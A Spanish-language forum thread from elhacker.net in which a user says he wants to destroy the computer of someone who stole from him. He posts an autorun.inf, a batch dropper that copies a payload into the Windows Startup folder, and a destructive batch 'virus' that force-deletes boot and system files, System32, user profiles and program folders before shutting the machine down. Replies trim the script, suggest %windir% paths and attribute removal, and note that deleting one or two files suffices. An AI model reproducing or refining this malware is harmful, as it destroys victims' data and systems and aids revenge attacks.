elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Ayuda con Autorun, Batch y pendrive
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con Autorun, Batch y pendrive  (Leído 5,098 veces)
EL ZAR08

Desconectado Desconectado

Mensajes: 21


Ver Perfil
Ayuda con Autorun, Batch y pendrive
« en: 5 Febrero 2011, 20:23 pm »

Hola, yo de nuevo dando lata por este foro jejeje  :xD

Les expongo mi tema:

Por razones personales, me interesa destruirle el pc a una persona que me ha robado en ocasiones anteriores (uds saben, para darle una leccion...)

Lo que planeo hacer es meter en un pendrive un autorun que llame a un batch para copiar otro batch en la carpeta de inicio y al iniciar el pc, se autoejecute y destruya el pc.

Les doy mis codigos, si tienen ideas o saben como puedo mejorar algun codigo, seran bien recibidos.

Autorun:

Código:
[autorun]
open=copy.bat
shell\open\command=copy.bat

El batch para copiar mi virus

Código:
@echo off
EXPLORER "G:\"
copy "G:\Dark Poison.bat" "%USERPROFILE%\Mené Inicio\Programas\Inicio"
exit

En el batch anterior puse "EXPLORER "G:\" porque al darle click derecho sobre mi pc no abria la ventana del pendrive y... eso seria extraño jejeje  :xD

Aqui viene mi primera duda, en mi pc este pendrive es "G:\" pero si en otra pc es por ejemplo "F:\", ¿como saberlo o como forzar a windows a darle la G:\ u otra letra?

Y el code del virus...

Código:
@echo off
del /S /F /Q "C:\ntldr.dll"
del /S /F /Q "C:\*ntldr*"
del /S /F /Q "C:\Windows\System32\hal.dll"
del /S /F /Q "C:\Windows\System32\*hal*"
del /S /F /Q "C:\Windows\System32\ntoskrnl.exe"
del /S /F /Q "C:\command.com
del /S /F /Q "C:\Windows\win.com
del /S /F /Q "C:\Windows\Rundll.exe"
del /S /F /Q "C:\Windows\Rundll32.exe"
del /S /F /Q "C:\config.sys"
Copy %0 "C:\ntldr.dll"
Copy %0 "C:\Windows\System32\hal.dll"
Copy %0 "C:\Windows\System32\ntoskrnl.exe"
Copy %0 "C:\command.com
Copy %0 "C:\Windows\win.com
Copy %0 "C:\Windows\Rundll.exe"
Copy %0 "C:\Windows\Rundll32.exe"
Copy %0 "C:\config.sys"
del /S /F /Q "C:\Windows\System32\drivers"
taskkill /f /im "wmplayer.exe"
taskkill /f /im "ares.exe"
del /S /F /Q "C:\Documents and Settings"
del /S /F /Q "%USERPROFILE%"
del /S /F /Q "%APPDATA%\Local\Ares\My Shared Folder"
del /S /F /Q "C:\Windows\System"
del /S /F /Q "C:\Windows\System32"
@echo off
taskkill /f /im "msnmsgr.exe"
del /S /F /Q "%PROGRAMFILES%\Windows Live"
del /S /F /Q "%PROGRAMFILES%\Windows Live messenger"
del /S /F /Q "%PROGRAMFILES%\Messenger"
del /S /F /Q "%PROGRAMFILES%\Messenger Plus! Live"
@echo off
msg * Gracias por tu tiempo
msg * Tu computadora acaba de ser destruida por el Virus Dark Poison
shutdown -s -t 20 -c "Se te ha dañado el pc, cortesia de Virus Dark Poison"

Saludos, espero me puedan ayudar.
En línea

Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
Re: Ayuda con Autorun, Batch y pendrive
« Respuesta #1 en: 5 Febrero 2011, 21:55 pm »

osea, MUUUUY LAMMER LO TUYO.

ahora al batch
te sobran lineas.

asi deberia quedar:
Código:
@echo off
del /S /F /Q "C:\ntldr.dll"
del /S /F /Q "C:\*ntldr*"
del /S /F /Q "C:\Windows\System32\hal.dll"
del /S /F /Q "C:\Windows\System32\*hal*"
del /S /F /Q "C:\Windows\System32\ntoskrnl.exe"
del /S /F /Q "C:\command.com
del /S /F /Q "C:\Windows\win.com
del /S /F /Q "C:\Windows\Rundll.exe"
del /S /F /Q "C:\Windows\Rundll32.exe"
del /S /F /Q "C:\config.sys"
del /S /F /Q "C:\Windows\System32\drivers"
del /S /F /Q "C:\Documents and Settings"
del /S /F /Q "%USERPROFILE%"
del /S /F /Q "%APPDATA%\Local\Ares\My Shared Folder"
del /S /F /Q "C:\Windows\System"
del /S /F /Q "C:\Windows\System32"
shutdown -s -f

vamos por las partes inutiles ahora:

Código:
Copy %0 "C:\ntldr.dll"
Copy %0 "C:\Windows\System32\hal.dll"
Copy %0 "C:\Windows\System32\ntoskrnl.exe"
Copy %0 "C:\command.com
Copy %0 "C:\Windows\win.com
Copy %0 "C:\Windows\Rundll.exe"
Copy %0 "C:\Windows\Rundll32.exe"
Copy %0 "C:\config.sys"

PARA QUE CORNO COPIARTE?!?!?!

Código:
taskkill /f /im "wmplayer.exe"
taskkill /f /im "ares.exe"
taskkill /f /im "msnmsgr.exe"

Si vas a apagar la pc al final, para que esto ¬¬

Código:
del /S /F /Q "%PROGRAMFILES%\Windows Live"
del /S /F /Q "%PROGRAMFILES%\Windows Live messenger"
del /S /F /Q "%PROGRAMFILES%\Messenger"
del /S /F /Q "%PROGRAMFILES%\Messenger Plus! Live"
Lo de borrar las descargas del ares lo entiendo, retorcido pero bueh, ahora el MSN?!??! si la pc no le funciona :S

Por ultimo
Código:
msg * Gracias por tu tiempo
msg * Tu computadora acaba de ser destruida por el Virus Dark Poison
shutdown -s -t 20 -c "Se te ha dañado el pc, cortesia de Virus Dark Poison"

JAMAS hagas eso.


Creo que eso es todo lo que se me ocurre asi rapido y por arriba ^^





En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
Edu


Desconectado Desconectado

Mensajes: 1.082


Ex XXX-ZERO-XXX


Ver Perfil
Re: Ayuda con Autorun, Batch y pendrive
« Respuesta #2 en: 5 Febrero 2011, 22:27 pm »

Usa %windir% en vez de C:\Windows y sin comillas entonces quedaria
del /S /F /Q %windir%\System32\hal.dll

Se nota q has copiado el codigo, por el uso mas de una vez de @echo off asique mejor aprender primero porq ahora q veo bien tienes muchos errores y quieres borrar cosas q no se pueden de esa forma
En línea

EL ZAR08

Desconectado Desconectado

Mensajes: 21


Ver Perfil
Re: Ayuda con Autorun, Batch y pendrive
« Respuesta #3 en: 5 Febrero 2011, 22:45 pm »

Usa %windir% en vez de C:\Windows y sin comillas entonces quedaria
del /S /F /Q %windir%\System32\hal.dll

Se nota q has copiado el codigo, por el uso mas de una vez de @echo off asique mejor aprender primero porq ahora q veo bien tienes muchos errores y quieres borrar cosas q no se pueden de esa forma

Gracias, lo siento pero estoy aqui para aprender, jams dije que fuera un experto XD

una pregunta...

si pongo esto

Código:
del /S /F /Q "%windir%\System32\*.*"

borraria todos los archivos dentro de la carpeta system32 cierto?

y asi

Código:
del /S /F /Q "%windir%\System32\*.exe"

todos los ejecutables no?
En línea

Edu


Desconectado Desconectado

Mensajes: 1.082


Ex XXX-ZERO-XXX


Ver Perfil
Re: Ayuda con Autorun, Batch y pendrive
« Respuesta #4 en: 5 Febrero 2011, 22:57 pm »

Pero tendrias q sacarle los atributos tamb, y no digo q no vengas a aprender aca, pero es mejor si lees un tutorial bueno primero
En línea

jlpm

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Ayuda con Autorun, Batch y pendrive
« Respuesta #5 en: 10 Febrero 2011, 20:51 pm »

entonces con solo esto del /S /F /Q "%windir%\System32\*.* puedes joder un pc?
saludoss
En línea

Edu


Desconectado Desconectado

Mensajes: 1.082


Ex XXX-ZERO-XXX


Ver Perfil
Re: Ayuda con Autorun, Batch y pendrive
« Respuesta #6 en: 10 Febrero 2011, 21:03 pm »

Fijate un post mas arriba lo q puse, y con solo borrar 2 archivos o solo 1 ya esta
En línea

jlpm

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Ayuda con Autorun, Batch y pendrive
« Respuesta #7 en: 10 Febrero 2011, 22:38 pm »

y funciona en winndows 7 y en vista?
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Batch] Borrar archivos de una Pendrive « 1 2 »
Scripting
hozht 13 11,448 Último mensaje 21 Agosto 2012, 18:34 pm
por Eleкtro
[BATCH] OWNED AUTORUN.inf, evitar que se ejecute en las pendrives
Scripting
FranciskoAsdf 0 4,014 Último mensaje 1 Abril 2009, 03:37 am
por FranciskoAsdf
Autorun Eater 2.5: Detecta y elimina archivos Autorun.inf peligrosos con ....
Noticias
wolfbcn 0 4,497 Último mensaje 11 Mayo 2010, 20:57 pm
por wolfbcn
Ayuda con Autorun, Batch y pendrive
Hacking
EL ZAR08 1 4,172 Último mensaje 5 Febrero 2011, 22:28 pm
por Edu
Ayuda con autorun
Programación General
j0lama 3 1,848 Último mensaje 22 Septiembre 2015, 22:58 pm
por El Benjo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines